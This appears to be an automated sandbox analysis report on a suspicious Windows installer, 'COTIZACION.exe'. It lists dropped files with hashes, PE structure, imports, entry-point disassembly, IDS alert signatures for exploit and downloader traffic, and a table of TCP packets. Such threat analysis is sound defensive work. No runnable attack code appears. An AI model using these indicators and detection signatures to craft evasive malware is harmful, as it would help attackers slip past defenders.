SSDEEP:	6144:V6g8qXtz3vFPEIP/Z5y1kvKYeTOGJcNGEZ4TGNUTb2Cy4biqdAR+a+:Yg8qdz/Fs2xPh9UTy4OqOR8
MD5:	4CBE283FD9A441ECBBD647E4916EEBB2
SHA1:	5C8FA8ABD72007C452171985F3D2E2BE3D2CDAE0
SHA-256:	402DE88C6E98FB4B4DD1B50F8A629E519825E8FE25D341CA734A8648D1E44CF4
SHA-512:	D52B174FA6FC6D2866B53164EA547721A94A805AC7D7693DD323A1B909FD467EA4AB6DF69BDD9F5B8811AF7839AE06B53EC88ADD548DE4C087582D9B8ABC3DA7
Malicious:	false
Preview:	....>>..................aaaa...88......w....A.nn.++.........---........................................6666666.ZZZZZ......oooo.[....k....yyy.......<<.....?......99.................H....N.8.....w...555....YY..H...$$...PPPP...........................(((........a..@l.;.<sU.].\|...H....aG...(..x{r.Ac..\X.u.Z.d.._.h...IJ..8.#....o.f.b..<4...b.......F....=.T.3..QyE.....p.).e...&.L.....0..W.Kf........2.t.......o.Sp]...Y`...6..C..R....-...z....%.w.O.x.....f....G.g..N...... ....i.".^P.+.}j..@.m.....1...?kne~..5...VhvM...GR.D[..9f......f.f..0.....q.l.;.<sU.].\|...H....aG...(..x{r.Ac..\X.4......./.Z.d.._.h...IJ..8.#.4...b.......F....=.T.3....#....r.l.FQyE.....p.).e...&.L.....0..W.K..t.......o.Sp]...Y`...6..C..R........f.....-...z....%.w.O..g..N..... .f......5 ....i.".^P.+.}j..@.m.....1...?kne~..5...VhvM...GR...W..h.....%[..9{.....q.l.;.<sU.].\|...H....aG......f....7.(..x{r.Ac..\X.u.Z.d.._.h...IJ..8.#.4...b.......F............=.T.3..QyE.....p.).e.....u.

C:\Users\user\overlays\besvangredes\Ordner\boyaus.rom

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	392462
Entropy (8bit):	1.241128723454179
Encrypted:	false
SSDEEP:	768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
MD5:	F130EC3095DBECEDC791D8C58A59040C
SHA1:	DAD2300B487F31F199520E1B41AB02B7D677B352
SHA-256:	A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
SHA-512:	8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
Malicious:	false
Preview:	..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................

C:\Users\user\overlays\besvangredes\Ordner\gear.dra

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	433786
Entropy (8bit):	1.255949132332751
Encrypted:	false
SSDEEP:	768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
MD5:	53FF1A157920AE92C9BF891D453D6B65
SHA1:	B7BF3B7B16048F38132D8ACCA841130D73DB44C3
SHA-256:	FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
SHA-512:	E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
Malicious:	false
Preview:	......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................

C:\Users\user\overlays\besvangredes\Ordner\jagtfalk.ill

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	374902
Entropy (8bit):	1.250991222921627
Encrypted:	false
SSDEEP:	1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
MD5:	169115C751DDA5E021E8C86E8454B26D
SHA1:	5A8254634C0C726BB18E42E626EAEB581D532DCD
SHA-256:	ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
SHA-512:	2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
Malicious:	false
Preview:	.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........

C:\Users\user\overlays\besvangredes\Proprietrer.bet

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	288955
Entropy (8bit):	1.2577770955280814
Encrypted:	false
SSDEEP:	768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
MD5:	0B62328C4966F6B879B3C13B7FBD9C0D
SHA1:	6DD81F12E739E81E06778067513ED1178A06AFC9
SHA-256:	645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
SHA-512:	2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
Malicious:	false
Preview:	.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................\|............................................................[.................................................\.......................v...........o...................................m...........

C:\Users\user\overlays\besvangredes\Satsarbejderne.Lam

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	151990
Entropy (8bit):	4.6092449184746345
Encrypted:	false
SSDEEP:	3072:3HVXpvI/fnNmqleoynn5lDoEBFu60Pj9mK74o:lOnnNTQnwEBYzPL7F
MD5:	3BF6794475FF09EB5AED2B0A0810247B
SHA1:	1B00D2784EA48A65EE1334677047DB1124A8655C
SHA-256:	4832E36CBC3343EE8A5EFE052EE3E4502F288055F023536CBA4B7B75F9C66BF1
SHA-512:	03E759376F980731823284C203088329CE227C073AC8E6A4E1514C65A1B8E4DCAD1F869E273705D21F2C69C3726F506804FB1F27EAB5D6032013B27AFA96816A
Malicious:	false
Preview:	............[....?....OOOO..........]..=............KKK.R..www.................--..........T............xx...........................R.....k.....)........Q.........f.;.................r.CC.....66.z....... ..Y.................^^^.........\...............LLL..............44.!..................g.~~~~~.....ddd....YY......$...;.....................).....cc..............##...................{{{.777..........JJ....S...............t..jj.....7.............`.......0....L.MM..........HHHH...S.g..CC. ............g..................9...................N...ii...................w..11..\|\|\|\|\|................EE................ .................DDDD..............u..@@@..*....j...........[[........ .....w...v...AA........g...................BB.3...........d.....oo...WWWW.. ...............,...........W........y....................#..................j....V............................K.............................................................]...........=..........................I...@@.................

C:\Users\user\overlays\besvangredes\Trikstanks.pra

Download File

Process:	C:\Users\user\Desktop\COTIZACION.exe
File Type:	data
Category:	dropped
Size (bytes):	340974
Entropy (8bit):	1.254605943274635
Encrypted:	false
SSDEEP:	768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
MD5:	49BE0E06F2E4F0CCFFB46426EE262642
SHA1:	FF9C56C31A824E4CA087705C23D01D288FE34239
SHA-256:	A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
SHA-512:	27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
Malicious:	false
Preview:	.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................\|. .....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.815762039907831
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	COTIZACION.exe
File size:	1'206'384 bytes
MD5:	ad3b285c00819c0aa52bb492ce560bc1
SHA1:	93dcb8eb3ac7fa43dc97cc36f203622adc195a8e
SHA256:	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9
SHA512:	b0c06b3fb0366b45241757b32821ad2107494e2d922a9c18532fc2233aecb398a1e7da1f480e94a72039f36370143921f9498ca9bbf1320e243604b1d870c9ae
SSDEEP:	24576:X4nhDoAFInEmQcT2qViRfrBNFI0ZNXLGQ7WczkxFnfbP9u:X+hkbnR/T2qCr5IiNXKQKczg4
TLSH:	EF45232D3564C14FEA821B384FF6E3769D7AEC143D25912B77313B09EE7124C9E9A260
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.

File Icon


Icon Hash:	873335651170390f

Static PE Info

General

Entrypoint:	0x4036da
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Queenite, O=Queenite, L=Saint-Priest-la-Roche, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	17/03/2024 04:32:03 17/03/2027 04:32:03
Subject Chain	CN=Queenite, O=Queenite, L=Saint-Priest-la-Roche, C=FR
Version:	3
Thumbprint MD5:	D5F780643C6D961B02C970DE0E3E5FC0
Thumbprint SHA-1:	3B417C0BA2B66A5F87DD2B4BD8DC4BB7CBA38C5A
Thumbprint SHA-256:	7066DFF47C4033ABEC8C429A87AFF4AB5060ED26AFF6B95419554F6EB19AFCB0
Serial:	393EB7EDE7DF3B338344C0D3BF2685CC21FD4235

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00408170h]
mov esi, dword ptr [004080ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F6AF126D939h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F6AF126D913h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F6AF126D90Dh
xor eax, eax
jmp 00007F6AF126D8F4h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F6AF126D90Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F6AF126D906h
mov eax, dword ptr [esp+38h]
mov dword ptr [007A8638h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a00	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3db000	0x3e910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x125638	0x1238	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c0b	0x6e00	9178309eee1a86dc5ef945d6826a6897	False	0.6605823863636363	data	6.398414552532143	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1896	0x1a00	0885e83a553c38819d1fab2908ca0cf5	False	0.4307391826923077	data	4.86610208699674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e640	0x200	5c0f03a1a77f205400c2cbabec9976c4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x32000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3db000	0x3e910	0x3ea00	2690c3c0c1de505f961321c7e2d6da34	False	0.6915076097804391	data	6.574790239627466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3db388	0x16482	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.000394451383867
RT_ICON	0x3f1810	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.486498876138649
RT_ICON	0x402038	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5308492747529956
RT_ICON	0x40b4e0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5497227356746766
RT_ICON	0x410968	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5415682569674067
RT_ICON	0x414b90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5884854771784233
RT_ICON	0x417138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6179643527204502
RT_ICON	0x4181e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6668032786885246
RT_ICON	0x418b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7287234042553191
RT_DIALOG	0x418fd0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4190d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4191f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4192b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x419318	0x84	Targa image data - Map 32 x 25730 x 1 +1	English	United States	0.7348484848484849
RT_VERSION	0x4193a0	0x220	data	English	United States	0.5110294117647058
RT_MANIFEST	0x4195c0	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5529131985731273

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T12:37:29.294568+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.9	49797	TCP
2024-11-05T12:38:10.074857+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.9	64762	TCP
2024-11-05T12:38:31.323411+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	64763	142.250.185.238	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 12:38:29.899483919 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:29.899528027 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:29.899599075 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:29.910176039 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:29.910196066 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:30.791064978 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:30.791318893 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:30.791861057 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:30.791949034 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:30.864016056 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:30.864053011 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:30.864485979 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:30.864540100 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:30.869024992 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:30.915330887 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:31.323402882 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:31.323471069 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:31.323641062 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:31.323683023 CET	443	64763	142.250.185.238	192.168.2.9
Nov 5, 2024 12:38:31.323729992 CET	64763	443	192.168.2.9	142.250.185.238
Nov 5, 2024 12:38:31.346107006 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:31.346160889 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:31.346231937 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:31.346504927 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:31.346523046 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:32.211996078 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:32.212146044 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:32.216495991 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:32.216514111 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:32.216792107 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:32.217255116 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:32.217643976 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:32.259341955 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.746994972 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.747159004 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.755695105 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.755806923 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.863961935 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.864041090 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.864063978 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.864082098 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.864105940 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.864125967 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.868623972 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.868731976 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.873490095 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.873580933 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.873593092 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.873651028 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.878256083 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.878314018 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.878320932 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.878377914 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.884512901 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.884593010 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.884613991 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.884668112 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.980891943 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.980954885 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.980988979 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.980990887 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.981002092 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.981019020 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.981084108 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.987699032 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.987762928 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.987776041 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.987840891 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.992539883 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.992599964 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:34.992685080 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:34.992737055 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.001106024 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.001173973 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.001195908 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.001291990 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.001300097 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.001431942 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.098541975 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.098628044 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.098669052 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.098669052 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.098684072 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.098726034 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.098740101 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.098794937 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.104851961 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.104926109 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.104934931 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.104985952 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.109771967 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.109832048 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.109838009 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.109908104 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.118278980 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.118331909 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.118349075 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.118405104 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.118410110 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.118475914 CET	64764	443	192.168.2.9	142.250.185.161
Nov 5, 2024 12:38:35.118482113 CET	443	64764	142.250.185.161	192.168.2.9
Nov 5, 2024 12:38:35.118526936 CET	64764	443	192.168.2.9	142.250.185.161
